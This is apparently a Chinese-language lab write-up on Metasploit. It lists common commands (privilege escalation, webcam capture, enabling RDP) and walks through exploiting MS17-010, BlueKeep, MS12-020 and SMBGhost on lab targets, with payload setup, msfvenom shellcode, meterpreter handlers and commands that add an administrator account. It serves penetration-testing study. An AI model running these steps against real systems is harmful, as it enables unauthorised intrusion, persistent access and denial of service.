1、完成msf升级与msf常用命令使用
2、完成ms17-010、cve02019-0708、ms12-020、cve-2020-0796实验并记住 这些常用 漏洞编号
1.1 msf常用命令使用
- ? 帮助菜单
- ? 命令名称 ,该命令的详细用法
- search 搜索模块名和描述
- ps 获取目标主机的进程
- shell 进入目标主机的cmd界面
6.getsystem:提权到本地系统权限
7.search f *.txt 搜索目标主机上的txt文件
8.webcam _list 查看摄像头
webcam _snap 通过摄像头拍照
webcam _stream 通过摄像头开启视频
9.run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2
PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662 - show options:查看工具的使用方法
11.back:返回上一层
12.溢出攻击执行的命令:run/exploit
13.info:查看工具的详细信息
1.2 MSF专业术语
1.渗透攻击 (Exploit)
渗透攻击是指攻击者或者测试者利用系统中的安全漏洞所进行的攻击行为。
攻击技术包括:缓冲区溢出,web应用程序漏洞,配置错误等
2.攻击载荷(paylod)
目标系统在被渗透攻击之后执行的代码
3.溢出代码(shellcode)
是在渗透攻击时作为攻击载荷运行的一组机器指令
4.模块(module)
是指msf框架中使用夫人一段软件代码组件
5.监听器(listener)
是msf中用来等待连入网络连接的组件
- poc:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码
1.3 更新msf
1.更换yum源,将原kali源注释,进入/etc/apt
/sources.list下将中科大的yum源复制进去。
中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
2.在kali中更新三方软件默认是不受信任的,需要下载并安装数字签名才能被信任。使用命令:
wget archive.kali.org/archive-key.asc //下载签名
apt-key add archive-key.asc //安装签名
image.png
3.安装msf框架。
使用以下命令:
root@bogon:~# apt-get update
root@kali:~# apt-get install metasploit-framework //安装msf框架
root@kali:~#msfconsole //发现有提示数据库未启动,退出msf启动数据库
root@kali:~# systemctl start postgresql //启动数据库
root@kali:~# systemctl enable postgresql //允许开机自启动
root@kali:~# msfdb init //构建数据库缓存
root@kali:~#msfconsole
注意:如果更新完msf出现才下问题
root@kaliew:~# msfconsole
[] Bundler failed to load and returned this error:
'cannot load such file -- bundler/setup'
[] You may need to uninstall or upgrade bundler
解决方法:
root@kaliew:~# sudo gem install bundler
root@kaliew:~# bundle update celluloid
2实验
2.1 ms17-010实验(永恒之蓝 445端口)
1.在kali中输入 msfconsole,进入后输人search ms17-010(永恒之蓝),找到exploit windows/smb/ms17_010_eternalblue,运行use exploitwindows/smb/ms17_010_eternalblue
image.png
2.输入show options 查看和配置RHOST(靶机)和LHOST(操作机),使用set rhosts ip(靶机ip)设置靶机ip。
image.png image.png
3.设置tcp连接:使用命令:set payload windows/x64/meterpreter/reverse_tcp,
然后输入run或exploit进行攻击
image.png
4.、输入shell进入对方机器增加用户
以创建用户 net user test 1234 /add(xxxx用户名 1234密码)
net localgroup administrators test /add (将用户设置为管理员权限)
5.上传文件,使用命令upload 源文件地址 上传地址
注意:windows系统下路径使用双斜线\
image.png
6.在目标主机上执行exe文件,使用命令:
execute -f 上传地址
2.2 cve02019-0708实验(远程连接3389端口)
1.在kali中输入 msfconsole,进入后输人search CVE-2019-0708,
运行 indows/rdp/cve_2019_0708_bluekeep_rce。
image.png
2.set RHOSTS 受害机IP设置受害机IP
set RPORT 受害机PORT设置受害机RDP端口号
set target ID数字(可选为0-4)设置受害机机器架构
使用的是VMware,那么 target 2 满足条件
image.png
3.使用 exploit 开始攻击,等待建立连接
4.建立连接以后,使用shell获得shell
2.3 ms12-020实验(远程连接,出现蓝屏)
1.在kali中输入 msfconsole,进入后输人search ms12-020,
运行 dos/windows/rdp/ms12_020_maxchannelids。
image.png
2.实验结果:
image.png
2.4 cve-2020-0796实验
1.利用POC检测:https://github.com/ollypwn/SMBGhost
实验结果出现蓝屏现象。
image.png
1、 msfvenom生成正向连接木马
使用命令:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)
image.png2、开启msf监听
在kali输入msfconsole进入msf界面
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888 //监听端口
set rhost 192.168.142.129 //目标主机
run
image.png
进入SMBGhost_RCE_PoC-master,输入命令:python3 exploit.py -ip 目标地址ip
3.运行exploit.py脚本,反弹shell
网友评论